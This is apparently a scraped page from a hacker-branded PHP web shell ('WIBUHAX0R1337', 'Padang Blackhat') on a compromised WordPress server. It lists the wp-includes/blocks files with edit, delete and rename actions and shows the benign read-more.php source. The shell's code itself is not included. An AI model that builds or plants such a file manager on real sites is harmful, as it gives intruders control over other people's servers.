-
WIBUHAX0R1337
-
/
home
/
cideo
/
www
/
wp-includesVIp
/
blocks
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
archives
--
NONE
audio
--
NONE
avatar
--
NONE
block
--
NONE
button
--
NONE
buttons
--
NONE
calendar
--
NONE
categories
--
NONE
code
--
NONE
column
--
NONE
columns
--
NONE
comment-author-name
--
NONE
comment-content
--
NONE
comment-date
--
NONE
comment-edit-link
--
NONE
comment-reply-link
--
NONE
comment-template
--
NONE
comments
--
NONE
comments-pagination
--
NONE
comments-pagination-next
--
NONE
comments-pagination-numbers
--
NONE
comments-pagination-previous
--
NONE
comments-title
--
NONE
cover
--
NONE
embed
--
NONE
file
--
NONE
freeform
--
NONE
gallery
--
NONE
group
--
NONE
heading
--
NONE
home-link
--
NONE
html
--
NONE
image
--
NONE
latest-comments
--
NONE
latest-posts
--
NONE
legacy-widget
--
NONE
list
--
NONE
list-item
--
NONE
loginout
--
NONE
media-text
--
NONE
missing
--
NONE
more
--
NONE
navigation
--
NONE
navigation-link
--
NONE
navigation-submenu
--
NONE
nextpage
--
NONE
page-list
--
NONE
page-list-item
--
NONE
paragraph
--
NONE
pattern
--
NONE
post-author
--
NONE
post-author-biography
--
NONE
post-author-name
--
NONE
post-comments-form
--
NONE
post-content
--
NONE
post-date
--
NONE
post-excerpt
--
NONE
post-featured-image
--
NONE
post-navigation-link
--
NONE
post-template
--
NONE
post-terms
--
NONE
post-title
--
NONE
preformatted
--
NONE
pullquote
--
NONE
query
--
NONE
query-no-results
--
NONE
query-pagination
--
NONE
query-pagination-next
--
NONE
query-pagination-numbers
--
NONE
query-pagination-previous
--
NONE
query-title
--
NONE
quote
--
NONE
read-more
--
NONE
rss
--
NONE
search
--
NONE
separator
--
NONE
shortcode
--
NONE
site-logo
--
NONE
site-tagline
--
NONE
site-title
--
NONE
social-link
--
NONE
social-links
--
NONE
spacer
--
NONE
table
--
NONE
tag-cloud
--
NONE
template-part
--
NONE
term-description
--
NONE
text-columns
--
NONE
verse
--
NONE
video
--
NONE
widget-group
--
NONE
archives.php
2.887KB
Edit File
Delete File
Rename
avatar.php
5.311KB
Edit File
Delete File
Rename
comments-pagination-numbers.php
1.557KB
Edit File
Delete File
Rename
comments-pagination-previous.php
1.6KB
Edit File
Delete File
Rename
cover.php
2.434KB
Edit File
Delete File
Rename
gallery.php
4.854KB
Edit File
Delete File
Rename
home-link.php
4.74KB
Edit File
Delete File
Rename
index.php
0.761KB
Edit File
Delete File
Rename
latest-comments.php
4.885KB
Edit File
Delete File
Rename
legacy-widget.php
3.811KB
Edit File
Delete File
Rename
page-list.php
13.139KB
Edit File
Delete File
Rename
post-author-biography.php
1.414KB
Edit File
Delete File
Rename
post-author-name.php
1.705KB
Edit File
Delete File
Rename
post-featured-image.php
7.193KB
Edit File
Delete File
Rename
post-title.php
1.812KB
Edit File
Delete File
Rename
query-no-results.php
1.765KB
Edit File
Delete File
Rename
query-pagination-numbers.php
3.726KB
Edit File
Delete File
Rename
query.php
0.297KB
Edit File
Delete File
Rename
read-more.php
1.75KB
Edit File
Delete File
Rename
search.php
19.937KB
Edit File
Delete File
Rename
site-tagline.php
0.971KB
Edit File
Delete File
Rename
site-title.php
1.729KB
Edit File
Delete File
Rename
social-link.php
59.563KB
Edit File
Delete File
Rename
tag-cloud.php
1.37KB
Edit File
Delete File
Rename
template-part.php
9.427KB
Edit File
Delete File
Rename
<?php /** * Server-side rendering of the `core/read-more` block. * * @package WordPress */ /** * Renders the `core/read-more` block on the server. * * @param array $attributes Block attributes. * @param string $content Block default content. * @param WP_Block $block Block instance. * @return string Returns the post link. */ function render_block_core_read_more( $attributes, $content, $block ) { if ( ! isset( $block->context['postId'] ) ) { return ''; } $post_ID = $block->context['postId']; $post_title = get_the_title( $post_ID ); if ( '' === $post_title ) { $post_title = sprintf( /* translators: %s is post ID to describe the link for screen readers. */ __( 'untitled post %s' ), $post_ID ); } $screen_reader_text = sprintf( /* translators: %s is either the post title or post ID to describe the link for screen readers. */ __( ': %s' ), $post_title ); $justify_class_name = empty( $attributes['justifyContent'] ) ? '' : "is-justified-{$attributes['justifyContent']}"; $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $justify_class_name ) ); $more_text = ! empty( $attributes['content'] ) ? wp_kses_post( $attributes['content'] ) : __( 'Read more' ); return sprintf( '<a %1s href="%2s" target="%3s">%4s<span class="screen-reader-text">%5s</span></a>', $wrapper_attributes, get_the_permalink( $post_ID ), esc_attr( $attributes['linkTarget'] ), $more_text, $screen_reader_text ); } /** * Registers the `core/read-more` block on the server. */ function register_block_core_read_more() { register_block_type_from_metadata( __DIR__ . '/read-more', array( 'render_callback' => 'render_block_core_read_more', ) ); } add_action( 'init', 'register_block_core_read_more' );
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat